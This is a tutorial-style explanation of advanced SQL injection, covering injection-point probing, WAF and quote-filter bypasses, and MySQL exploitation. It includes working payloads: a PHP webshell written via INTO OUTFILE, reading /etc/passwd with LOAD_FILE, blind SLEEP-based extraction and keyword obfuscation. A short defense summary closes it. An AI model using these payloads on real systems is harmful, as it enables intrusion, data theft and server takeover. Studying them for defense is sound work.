Advanced Exploitation and Defense Bypass Techniques of SQL Injection Attacks

Advanced Exploitation and Defense Bypass Techniques of SQL Injection Attacks

I. Knowledge Point Description
SQL injection attack is a vulnerability exploitation technique where attackers insert malicious SQL code into an application's input parameters, tricking the server into executing unintended SQL commands. Advanced exploitation involves data extraction, privilege escalation, or bypassing defense mechanisms (such as WAFs, input filters) in complex scenarios. The core challenge lies in constructing effective payloads to achieve injection when basic filters (e.g., keyword filtering, escape character handling) are present.

II. Step-by-Step Explanation of the Solution Process

Step 1: Identify Injection Points and Filtering Rules

  • Objective: Confirm whether parameters are vulnerable to SQL injection and probe defense rules (e.g., filtered keywords, special characters).
  • Methods:
    1. Submit a single quote ' to observe if an error occurs (e.g., database error messages are exposed).
    2. Attempt basic injection statements (e.g., ' OR 1=1--); if intercepted, it indicates the possible presence of a WAF or input filtering.
    3. Determine filtering rules through error feedback or response delays (time-based blind injection), for example:
      • If UNION SELECT is blocked, try splitting keywords: UNI/**/ON SEL/**/ECT.
      • If spaces are filtered, use comment characters /**/ or tab characters %09 as substitutes.

Step 2: Bypass Keyword Filtering

  • Principle: WAFs typically rely on blacklists to match keywords, which can be bypassed using obfuscation techniques.
  • Methods:
    1. Case Mixing: UnIoN SeLeCT (some WAFs do not normalize case).
    2. Inline Comments (MySQL): /*!UNION*/ /*!SELECT*/ leverages database-specific features.
    3. Encoding Obfuscation: URL encoding (%55%4E%49%4F%4E corresponds to UNION), double-writing keywords (UNUNIONION).
    4. Comment Splitting: U/**/N/**/I/**/O/**/N disrupts keyword detection.

Step 3: Bypass Character Escaping and Quote Restrictions

  • Scenario: When single quotes are escaped (\') or filtered, making it impossible to directly close strings.
  • Methods:
    1. Numeric Injection: When parameters are numeric (e.g., id=1), directly construct 1 OR 1=1 without quotes.
    2. Hexadecimal Encoding: Convert strings to hexadecimal to avoid quotes, for example:
      • Original statement: ' UNION SELECT username, password FROM users--
      • Bypass: 1 UNION SELECT 1,2 FROM users WHERE username=0x61646D696E (0x61646D696E is the hexadecimal of admin).

Step 4: Advanced Exploitation Using Database Features

  • Objective: Extract data or execute system commands after successful injection.
  • Example (MySQL):
    1. Information Retrieval: Query table and column names via the information_schema database: 
      UNION SELECT table_name, column_name FROM information_schema.columns WHERE table_schema=database()
    2. File Read/Write: Use LOAD_FILE() to read files (e.g., /etc/passwd), or INTO OUTFILE to write a webshell: 
      ' UNION SELECT "<?php system($_GET['cmd']); ?>",2 INTO OUTFILE "/var/www/html/shell.php"--
    3. Automated Time-Based Blind Injection: When there is no direct output, extract data character by character using conditional statements and sleep functions (e.g., SLEEP(5)): 
      ' OR IF(SUBSTRING(database(),1,1)='a', SLEEP(5), 0)--

Step 5: Comprehensive Defense Bypass Case Study

  • Scenario: Assume the WAF filters UNION, SELECT, and spaces, and escapes single quotes.
  • Bypass Payload:
    1. Use comment characters as space substitutes: /**/.
    2. Obfuscate keywords: /*!UNION*//*!SELECT*/ 1,2,3.
    3. Submit multiple identical parameters via parameter pollution (e.g., ?id=1&id=2) to potentially confuse WAF parsing.

III. Summary of Defense Measures

  1. Prepared Statements: Separate SQL logic from data, completely preventing injection.
  2. Whitelist Filtering: Strictly validate input types (e.g., numbers, enumerated values) instead of relying on blacklists.
  3. Principle of Least Privilege: Grant database accounts only necessary permissions (prohibit file read/write, system command execution).
  4. In-Depth WAF Defense: Combine semantic analysis and behavioral detection rather than relying solely on keyword matching.

Through the above steps, one can systematically master advanced SQL injection exploitation and bypass techniques, while understanding the importance of multi-dimensional defense strategies.